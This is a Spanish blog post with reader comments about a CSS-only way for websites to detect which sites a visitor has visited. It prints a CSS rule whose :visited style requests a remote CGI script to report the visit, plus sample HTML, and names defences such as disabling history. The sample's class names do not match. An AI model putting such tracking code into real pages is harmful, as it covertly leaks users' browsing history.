Hace un tiempo Jeremiah Grossman había realizado una demostracón que posibilitaba que un sitio web sepa que sitios ha visitado un usuario. Todo esto empleando Javascript.
Sin embargo, leo en ha.kers.org sobre una nueva forma de lograr lo anterior utilizando únicamente CSS, creando una simple lógica condicional que no solo detecta si hemos visitado determinados sitios web, si no que puede enviar la información a un servidor remoto incluyendo nuestra dirección IP por decir un ejemplo.
Prácticamente todos los navegadores son vulnerables a esto: Internet Explorer, Firefox, Opera, Konqueror o Safari son algunos de ellos.
Veamos un ejemplo sencillo. Tenemos un código CSS:
a:visited span.span1 {
display:block;
background: url(CSS-history.cgi?[datos adicionales a enviar al servidor]);
}
#a span {
display:none;
}
Y un código HTML:
<div class=”box”>
<a href=”http://www.zonafirefox.net/”>
http://www.zonafirefox.net
<span class=”span0″>Visitado</span>
</a>
</div>
Al visitar el vínculo y si tenemos el historial activado, el elemento ‘span1‘ se hará visible, activando una supuesta imagen de fondo que consiste en una peticón a un script cgi remoto que almacena los datos enviados, incluyendo datos de nuestro navegador si lo quisiera.
Pueden realizar una demostracón online realizada por RSnake que les dejo a continuación:
http://ha.ckers.org/weird/CSS-history.cgi
Para comprobar la demostracón, simplemente abran una nueva pestaña y visiten cualquiera de los sitios que aparecen en la lista.
La solución es tener el historial desactivado (no en 0 días). Personalmente yo de por sí tengo siempre deshabilitado el historial ya que me parece algo obsoleto.
La otra solución es para Firefox instalando la extensión SafeHistory. Como ven, en este caso no nos salvamos ni con Javascript deshabilitado. Si bien puede que no sea nada de alerta máxima, es posible ser rastreados, y muy fácilmente.
A quien le interese una copia del script cgi empleado para la demostracón, puede descargarlo desde aquí.
Al menos yo hice la prueba en Firefox 2.0.0.2, Firefox 3 a3 pre, Opera 9.10 y IE7 y todos caen. Que les sucede a ustedes?
6 Comentarios
2:29 | #
mmm me da un poquito de miedo estas cosas, por las dudas borrare mi historial mas seguido, que esta pasando que tienen que controlar todo eh?
2:33 | #
Yo ni lo uso al historial pero casi todo el mundo lo hace. Me sorprendó la forma en como logra hacerlo, hay que andar con cuidado.
Lo que no se, es como haces para comentar tan rápido che!
Gracias!
4:38 | #
A mi me pasó algo distinto, al entrar sólo tenía marcada una (no Google ????) cuando hice click en el vínculo y volví, la marcó.
Obviamente es peligroso. No tanto por el historial si no por el hecho de extraer cierta información via CSS algo que hasta ahora era impensado.
PD: ¿lo estás amansando a Rasa? ¿abandonará IE?
4:45 | #
Será porque es google.com.ar en tu caso y no google.com? La verdad, no creí que fuese posible algo así con CSS, y es facilísimo implementarlo.
Rasa ya me ha enviado capturas usando Firefox. No se si lo abandonó, pero el hecho de que haya pisado este sitio y se haya bajado un tema para Firefox ha sido noticia
17:06 | #
jajaja sigo usando IE a full salvo para Blogger o para descargas que uso FF.
Digamos que para esa dos funciones Internet Explorer es algo…estemmm como llamarlo: HIJOPUTA
19:30 | #
jajaj, algo es algo Rasa
Entre nosotros JMiur, se está evangelizando, :$